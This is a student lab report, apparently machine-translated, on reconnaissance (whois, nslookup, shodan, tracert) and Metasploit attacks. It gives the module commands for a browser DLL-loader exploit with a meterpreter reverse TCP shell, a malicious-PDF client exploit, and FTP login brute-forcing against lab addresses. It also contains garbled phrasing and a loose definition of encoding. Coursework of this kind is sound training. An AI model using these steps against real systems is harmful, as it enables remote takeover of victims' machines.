20155235 "Network Attack and Defense" Experiment 6 Information Collection and Vulnerability Scanning

20155235 "Network Attack and Defense" Experiment 6 Information Collection and Vulnerability Scanning

Experimental content

1. Application of various search techniques

2. Query of DNS IP registration information

3. Basic scanning techniques: host discovery, port scanning, OS and service version detection, enumeration of specific services

4. Vulnerability Scanning: Can scan, read reports, check vulnerability descriptions, and patch vulnerabilities

   Experiment 1. Application of various search techniques

   whois

• Use the whois command to query information
  The result is shown in the figure
  
  
  
  

nslookup

• get dig -hhelp
  
  
  
  
• DNS server query results and cached results of other websites
  
  
  
• Use the shodan search engine to query, get:
  
• IP reverse domain name query, get:
  

• IP2Location to query, get:
  

  tracert route detection

• Windows case:
  
• Linux situation:
  
  
  wonderful difference, emmn...

• Baidu's address
  

Experiment 2 Attacks on Browsers

• Enter in the terminal of kali to msfconsoleenter the console
• Enter use exploit/windows/browser/ms10_046_shortcut_icon_dllloader, get and use browser exploits
• Enter set payload windows/meterpreter/reverse_tcp, select backlink load
• Enter set SRVHOST 192.168.129.133, set the server host IP
• Enter set LHOST 192.168.129.133, set the IP of the attacking machine
• enter exploit, gethttp://192.168.129.133:80/
  
• Access on the target machine http://192.168.129.133:80/, a window will pop up
  
• At the same time, the attacker's computer gets the connection, and the input is sessionsviewed to the computer that bounces the link to the host.
  

• input sessions -i 2control target
  

  Experiment 3 Attacks on Clients

• Enter exploit/windows/fileformat/adobe_cooltype_sing, determine the attack plan
• Enter set LHOST 192.168.129.133, set the IP of the attacking machine
• Enter set LPORT 5235, set the attack port

• Transfer the generated pdf to the target machine to open, and start listening on kali at the same time
  

  Experiment 4 applies an auxiliary module

• Enter to show auxiliaryview all auxiliary modules
• Use scanner/http/dir_scannerscan directory

• Select ftp_login, scan 192.168.3.44to 192.168.43.48five, use the user name 20151124 (I randomly typed it), and the password is 123456.
  
  
  
  Experiment results: Miscalculation! Actually not!

  question

1. Explain in your own words what is exploit, payload, encode.
   Exploit is to use, find the loophole and use it!
   The payload is a carrier that allows us to put the virus in and transmit it to other people's computers.
   Encode encryption, in order to prevent our virus from being detected. The encryption method

Experimental experience

From the fourth test, I had an idea of ​​​​installing a memory stick. By this experiment, the idea finally took root. I want to install an 8G memory stick! ! ! ! ! Otherwise, the virtual machine can't be opened, isn't it funny!